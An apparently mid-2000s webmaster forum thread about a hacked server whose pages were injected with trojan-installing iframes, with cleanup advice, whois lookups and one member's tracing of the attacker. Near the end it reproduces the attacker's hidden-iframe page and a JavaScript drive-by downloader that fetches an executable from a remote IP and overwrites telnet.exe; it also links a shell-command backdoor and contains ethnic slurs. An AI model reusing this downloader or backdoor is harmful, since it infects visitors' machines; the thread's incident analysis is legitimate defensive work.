Fucking Hacked Server!!!!!!!!!

[Makingcoin]

What info can you get on ths fucknut?

http://www.whois.sc/trytoimprovesecurity.com

Someone hacked my fucking server and put and iframe that installs a trojan on every single html page I have. Years of fucking gallleries, sites, everything.

The page is being hosted at trytoimprovesecurity.com

Looks like his host is esthost.com

What can be done in a situation like this?

Thanks

[Babaganoosh]

Any idea how he got in? I'd figure that out first and plug the hole. Then you'll probably have to script something up to remove the iframe code recursively. Perl is your friend.

[Chris]

depends what you want done and how much cash you want to put up

[Makingcoin]

Quote:

Originally posted by Armed & Hammered
Any idea how he got in? I'd figure that out first and plug the hole. Then you'll probably have to script something up to remove the iframe code recursively. Perl is your friend.

Not sure exactlly how he got in. Host is working on it and writing a script up to change that shit.. Just want to know what can be done to this guy.

[Babaganoosh]

Quote:

Originally posted by Makingcoin
Not sure exactlly how he got in. Host is working on it and writing a script up to change that shit.. Just want to know what can be done to this guy.

I think I have a script here somewhere that will help you. I had to write one to change the counter code on a couple thousand pages when a certain counter started autoinstalling shit.

[Makingcoin]

Quote:

Originally posted by Armed & Hammered
I think I have a script here somewhere that will help you. I had to write one to change the counter code on a couple thousand pages when a certain counter started autoinstalling shit.

Icqing you now.

[NoCarrier]

That sucks.. Anyone in mind who doesn't like you?

[KC]

If the box was comprimised, then start over with a clean install on a new box. Don't think you can "plug" the hole and everything will be secure again.

Once it's been compromised it's damaged goods.

[Dirty F]

No, its a Russian dude, how is that possible. Russians and fucking things up?? wow, thats a new one.

Fuck, honestly, that part of the world should be disconnected from the net. Let them hack eachother.

[WarChild]

Host at swiftwill.com instead.

[wdsguy]

guess your host is not too update on security

[EviLGuY]

Quote:

Originally posted by Makingcoin
What info can you get on ths fucknut?

http://www.whois.sc/trytoimprovesecurity.com

Someone hacked my fucking server and put and iframe that installs a trojan on every single html page I have. Years of fucking gallleries, sites, everything.

The page is being hosted at trytoimprovesecurity.com

Looks like his host is esthost.com

What can be done in a situation like this?

Thanks

Not much if he's a Russian cocksucker. Suck it up and hire someone to lock down your box(es).

[Phoenix]

I hope your host will compensate you

free month...or two....

[Vitasoy]

Damn that certainly sucks. Sorry to hear.

[tootie]

I'll bet someone could make a pretty penny by moving to Russia and "taking care" of these guys that no one can seem to do anything about.

[Ar3s]

sorry to hear mate
hope you will fix things up..
let us know..good LUCK!

[QuaWee]

who's your host?

[WarChild]

Quote:

Originally posted by tootie
I'll bet someone could make a pretty penny by moving to Russia and "taking care" of these guys that no one can seem to do anything about.

And since storming in to a country to take on a part of (albeit a very, very small part) the local population is always a good idea.

Once they're done there, the same person could pop in to Afghanistan and grab Bin Laden too. That's a quick what, $25 mil?

[Fabien]

Quote:

Originally posted by NoCarrier
That sucks.. Anyone in mind who doesn't like you?

Ex wife ?

[fris]

Quote:

Originally posted by Makingcoin
What info can you get on ths fucknut?

http://www.whois.sc/trytoimprovesecurity.com

Someone hacked my fucking server and put and iframe that installs a trojan on every single html page I have. Years of fucking gallleries, sites, everything.

The page is being hosted at trytoimprovesecurity.com

Looks like his host is esthost.com

What can be done in a situation like this?

Thanks

well first off, if you would have secured your server before you put it online, then your data wouldnt have been insecure in the first place. i can garuantee you if i did a security audit on 100 machines on people on gfy, 85 would be insecure. no wonder all these sponsors are getting hacked. first thing you do when you buy a server is secure it. i never put any of my clients servers online until everything is locked up tight.

[fris]

Quote:

Originally posted by Phoenix
I hope your host will compensate you

free month...or two....

host is not responsable if its a server its up to the client. its his loss.

[TwinTone]

Quote:

Originally posted by Phoenix
I hope your host will compensate you

free month...or two....

Certainly not the fault of the host, especially if its a non managed server. Most of the reseller hosts wouldn't know how to secure a machine anyway.

New holes, and buffer overflows come out all the time.. we as a host try to alert customers of such things, and help them patch them. But unless you are paying a little more for a managed machine, or someone to take care of it, its just a matter of time until someone gets in.

No machine is 100% secure.. its not possible, so you better do all you can to keep it up to date.

[JayJay]

Ouch! that Sucks

[Aquarius]

Fucking Russians

[Makingcoin]

Quote:

Originally posted by TwinTone
Certainly not the fault of the host, especially if its a non managed server. Most of the reseller hosts wouldn't know how to secure a machine anyway.

New holes, and buffer overflows come out all the time.. we as a host try to alert customers of such things, and help them patch them. But unless you are paying a little more for a managed machine, or someone to take care of it, its just a matter of time until someone gets in.

No machine is 100% secure.. its not possible, so you better do all you can to keep it up to date.

It is a managed server. The host is taking care of me.

[chaze]

You can do a search and replace for the entire home partition, then back everything up before the trojans runs again.

Then get new server, upload, and secure better.

[GagOnMyCock]

craig man that sucks

get your host to do back ups..

[fr8]

That shitty as hell. Hopefully he will get what is coming to him.

[VeriSexy]

Damn that sucks dude, get this guy to secure your box

http://www.rack911.com/security.php

[SplitInfinity]

Hola! Sorry to hear of your hacker incidents.

Some things you need to do right now:


nmap your server from another clean box:

Such as: nmap -p 1-65535 yourServersIPhere

Will produce results showing which backdoors if any port based ones
are listening in for the hacker to return. Look for ports that are not supposed
to be running. Ones that really stand out are ones that spell things with numbers such as: 31337 Which in hacker world spells elite (yeah they spell wrong)

Also look for hidden files and processes. When your server is hacked, the intruder
runs a rootkit which runs hidden processes on your system which you cannot see
because they replace your normal ps binary with a rooted/hacked ps binary that hides any process they wish to hide.

You can get a linux binary here:
http://www.splitinfinity.com/resources/cp

that you can run on your server.
Right click on that and choose save-as, then put it on the hacked box and type:
chmod 0755 cp
then:
./cp

the results will show you any hidden processes running in your process tables.
It's a nice utility I use constantly to security audit machines here at SplitInfinity.

If your system has socklist installed, also run it: socklist
and study the results as they may point to hidden processes and ports running
as well.

Another great thing is: lsof
You use this to find where the hacker hid the files that are running as hidden processed because sometimes they can be hard to locate. lsof will show you the
source of the programs running and keeping files and ports open int he system.
before you kill any hidden processes, its always good to run lsof and take a look so you can actually FIND the crap they installed on your box so they can't remotely trigger it again. (Sometimes they install things in the public_html directories, or even startup items that restart their hack kits when you reboot)

Normally when your server is hacked, they replace all of the following binaries:

ls
lsof
md5sum
dir
ps
top
w
who
dirtree
socklist
ifconfig
/bin/login
sshd
ssh
proftpd
wuftpd
xinetd
inetd

and etc.... It is imperative that you start by installing a NEW md5sum package
and checking ALL your binaries against a known clean system and make sure the md5sum's match. Basically the md5sums are like fingerprints and if the file is at all what it is not supposed to be, those fingerprints wont match what the real file should be.

Example:

md5sum /bin/ls
typing that produces this result:
49da757b7b5ba585836ceb00086b6d98 /bin/ls

now if my /bin/ls was hacked, and a known true md5sum is the one above,
it would show completely different:

117c50271e390ba65561bce063301e7d /bin/ls

now I know that 49da757b7b5ba585836ceb00086b6d98 is the REAL md5sum
so if I get 117c50271e390ba65561bce063301e7d it must have been altered.

Also using the find command can find files that have been recently modified.
This only works if the hacker is sloppy as they normally replace find as well
and alter the dates so you cannot tell they modified anything....

Hidden files....
A simple:
locate ...
locate ".. "
might reveal some hidden directories they planted on your system
however keep in mind that locate was most likely hacked as well.

Anytime your system is compromised, you can replace all the binaries.
It's a good idea to back a backup of your system prior to putting it online
so you can simply restore a full set of binaries like /bin or /sbin in one fell swoop.
Once you know the binaries are ok, you can start to clean things up because you have the proper VIEW of your system.

Alot of people get hacked and then think they got the hacker out, but they only
think this because of the VIEW the hacker is giving them of their system.
They make things look normal when in fact they are far from it.
A hacker will sit an watch you and laugh about it the entire time.

If you need anything, security work, etc, feel free to call on us.

SplitInfinity Networks - Web Hosting, Co-location and Dedicated Servers
Managed - or Not. But always secure.

:-)

[Lace]

Sorry, didn't know this would cause such a problem.
I wont root anymore of your servers tonight.

[Triple 6]

damn, sorry 2 hear about that

[More Booze]

Sorry to hear about that, my server was also hacked a couple of months ago.
I was lucky because they didnt thouch anything.

But I lost 3 years of galleries, free sites and everything within my work-folder last night.
I was trying to install fedora and something got fucked up.

Im trying to recover it now, GetDataBack didnt do the job.

[Preacher]

that fucking sucks.. sorry to hear that...

[fuzebox]

Was this a managed server?

[Makingcoin]

Quote:

Originally posted by fuzebox


Was this a managed server?

Yes.

[SplitInfinity]

Ya know, since you are in the process of fixing everything.....

Why not move to a clean box over here that was secured before it went on-net?

I have a box ready for you right now......

ICQ: 64791506
AIM: NJesterIII
Email: [email protected]

[fuzebox]

Quote:

Originally posted by Makingcoin
Yes.

I would never trust one ;)

[PowerCum]

First of all... CHANGE HOSTING COMPANY. If you want some secure box quotes ICQ me 171216535.
Second, while you are still on that hacked server take a look at the apache config... probably he installed mod_layout and is just putting a layout on your pages. If no then use sed to change all the html files in bulk. There is no need for a complex script... sed can do the work.

[SplitInfinity]

Not sure if you noticed or not, but the apache server error shows another host/domain name, xpire.info. This is the same, but different info. I wonder if the
name is real or the phone numbers on this on. Doubtful, but maybe he slipped up?


Domain ID:D5946452-LRMS
Domain Name:XPIRE.INFO
Created On:23-May-2004 19:41:15 UTC
Last Updated On:02-Aug-2004 08:07:20 UTC
Expiration Date:23-May-2005 19:41:15 UTC
Sponsoring Registrar:R159-LRMS
Status:ACTIVE
Status:OK
Registrant ID:C4752858-LRMS
Registrant Name:Mike Fox
Registrant Organization:n/a
Registrant Street1:Hali-gali, 77
Registrant City:Deli
Registrant Postal Code:12345
Registrant Country:IN
Registrant Phone:+91.226370256
Registrant Email:[email protected]
Admin ID:C4752858-LRMS
Admin Name:Mike Fox
Admin Organization:n/a
Admin Street1:Hali-gali, 77
Admin City:Deli
Admin Postal Code:12345
Admin Country:IN
Admin Phone:+91.226370256
Admin Email:[email protected]
Billing ID:C4752858-LRMS
Billing Name:Mike Fox
Billing Organization:n/a
Billing Street1:Hali-gali, 77
Billing City:Deli
Billing Postal Code:12345
Billing Country:IN
Billing Phone:+91.226370256
Billing Email:[email protected]
Tech ID:C4752858-LRMS
Tech Name:Mike Fox
Tech Organization:n/a
Tech Street1:Hali-gali, 77
Tech City:Deli
Tech Postal Code:12345
Tech Country:IN
Tech Phone:+91.226370256
Tech Email:[email protected]
Name Server:NS1.SMARTDNS.ORG
Name Server:NS2.SMARTDNS.ORG
Name Server:NS1.SMARTNIC.ORG
Name Server:NS2.SMARTNIC.ORG

[Drama Bot V.1]

I clicked your site yesterday and got viruses, spywares and shit on my computer! Spent all last night deleting that shit! Thank's a lot....

[fris]

its its managed, the security is all their fault. they have no idea what is going on. they are clueless.

[SplitInfinity]

Learning more about this hacker....

xpire.info = A rooted server of someone elses.... I found a backdoor he installed:


Http://xpire.info/s/2
http://xpire.info/s/2?=$REQUEST_URI;?

Take a peek. That allows him to run shell commands.

Trying to locate him, I found his thing hidden atop this site:
http://www.allo-webmaster.com/heberg...xpire.info/s/2
Look at the small print on the top...

Might wanna see if he owns that site or if the owner of the site can explain why that link is on the top? Perhaps he is compromised as well? Perhaps this IS him?

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
%% BookMyName Whois version 1.0
%%
DOMAIN
Domain Name : allo-webmaster.com (AWC18-BMN-DOM)
Registrar : BookMyName
Whois Server : whois.bookmyname.com
Referral URL : https://www.bookmyname.com

Registrant / Admin Contact :
PERSON
Zak SADIQ (SADIQ2-BMN-PE)

hay salam 70

11000 Sale
FRANCE
phone : 02147483647
fax :
e-mail : [email protected]


Billing Contact :
PERSON
Zak SADIQ (SADIQ2-BMN-PE)

hay salam 70

11000 Sale
FRANCE
phone : 02147483647
fax :
e-mail : [email protected]


Technical Contact :
PERSON
Zak SADIQ (SADIQ2-BMN-PE)

hay salam 70

11000 Sale
FRANCE
phone : 02147483647
fax :
e-mail : [email protected]


Domain servers :
ns1.publi6.net (NPN23-BMN-HST)

ns2.publi6.net (NPN24-BMN-HST)


Created on 03/10/2004 18:21:45
Updated on 04/02/2004 14:49:02
Expires on 03/10/2005 13:21:45

Interesting HTML:

<title>Http://xpire.info/s/2 : recherche sur Http://xpire.info/s/2</title>hahahahahaha name="description" content="Http://xpire.info/s/2 ">
hahahahahaha name="keywords" content="Http://xpire.info/s/2">
hahahahahaha name="revisit-after" content="15 days">
hahahahahaha name="robots" content="index,follow">
hahahahahaha NAME="Language" CONTENT="fr">
hahahahahaha name="rating" content="General">
hahahahahaha name="resource-type" content="document">
hahahahahaha name="distribution" content="Global">
hahahahahaha name="copyright" content="Copyright (C), 2004, Allo webmaster , Http://xpire.info/s/2 ">
hahahahahaha name="author" CONTENT="Zaki">
hahahahahaha NAME="Language" CONTENT="fr">
hahahahahaha NAME="Identifier-URL" CONTENT="http://www.allo-webmaster.com">
hahahahahaha NAME="Reply-to" CONTENT="[email protected]">
hahahahahaha hahahahahahahahahaha="Content-Type" content="text/html; charset=iso-8859-1">
<link href="http://www.allo-webmaster.com/style.css" rel="stylesheet" type="text/css">

[SplitInfinity]

Here is another domain he owns/owned:

Domain Name: B00GLE.COM

Registrant:
n/a
Janet Jacjson ([email protected])
Hali-gali, 77
Deli
null,12345
IN
Tel. +91.226370256

Creation Date: 31-Mar-2004
Expiration Date: 31-Mar-2005

Domain servers in listed order:
ns1.smartdns.org
ns2.smartdns.org
ns1.smartnic.org
ns2.smartnic.org


Administrative Contact:
n/a
Janet Jacjson ([email protected])
Hali-gali, 77
Deli
null,12345
IN
Tel. +91.226370256

Technical Contact:
n/a
Janet Jacjson ([email protected])
Hali-gali, 77
Deli
null,12345
IN
Tel. +91.226370256

Billing Contact:
n/a
Janet Jacjson ([email protected])
Hali-gali, 77
Deli
null,12345
IN
Tel. +91.226370256

Status:SUSPENDED
Note: This Domain Name is Suspended. In this status the domain name is
InActive and will not function.

[SplitInfinity]

Seems that that server (the xpire.info one) is running a proxy server:

Interesting ports on 202.99.23.162:
(The 1653 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
80/tcp open http
8080/tcp closed http-proxy

[SplitInfinity]

This is the root site on the server:

http://202.99.23.162/


Not sure what language it is, but that is who the main owner of the server seems to be.

[SplitInfinity]

He seems to center around xpire.com and b00gle.com:


http://qkacdesign.uw.hu/chcounter/st...rs_days_stats=

[SplitInfinity]

Kinda sloppy, I'm finding lots about him:

Http://xpire.info/s/search.php?q=Http://


:-)

[SplitInfinity]

Seems he is busy at work, that link does not work anymore, howver this one began to:

http://www.xpire.info/fa/tool.html

This is what the source of tht page look like:

Code:

<html>
hahahahahaha>
</head>
<body bgcolor="Black">
<iframe src="http://TryToImproveSecurity.com/fa/t3.htm" width=1 height=1></iframe>
<!--<iframe src="http://TryToImproveSecurity.com/fa/test.html" width=1 height=1></iframe>//-->
<iframe src="http://TryToImproveSecurity.com/fa/x.htm" width=1 height=1></iframe>
<iframe src="http://TryToImproveSecurity.com/fa/proc.htm" width=1 height=1></iframe>
<iframe src="http://www.TryToImproveSecurity.com/fa/runevil.htm" width=1 height=1></iframe>
<IFRAME SRC="http://x.full-tgp.net/?fox.com" WIDTH=1 HEIGHT=1></IFRAME>
<iframe src="http://213.159.117.131/dl/fox.php" width=1 height=1></iframe>
</body>
</html>

[SplitInfinity]

Surely this guy is doing some bad shit:
Notice the telnet calls?

Code:

var downloadurl="http://213.159.117.133/dl/loadadv65.exe";

if(navigator.appVersion.hahahahahahaha("Windows NT 5.1")!=-1) savetopath="C:\\WINDOWS\\system32\\telnet.exe";
if(navigator.appVersion.hahahahahahaha("Windows NT 5.0")!=-1) savetopath="C:\\WINNT\\system32\\telnet.exe";

payloadURL = downloadurl;
var x = new ActiveXObject("Microsoft.XMLHTTP");
xhahahahahaha("GET",payloadURL,0);
x.Send();

function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t" + "r" + "e" + "a" + "m"; }

var s = new ActiveXObject(bla());
s.Mode = 3;
s.Type = 1;
shahahahahaha();
s.Write(x.responseBody);
s.SaveToFile(savetopath,2);

location.href = "telnet://";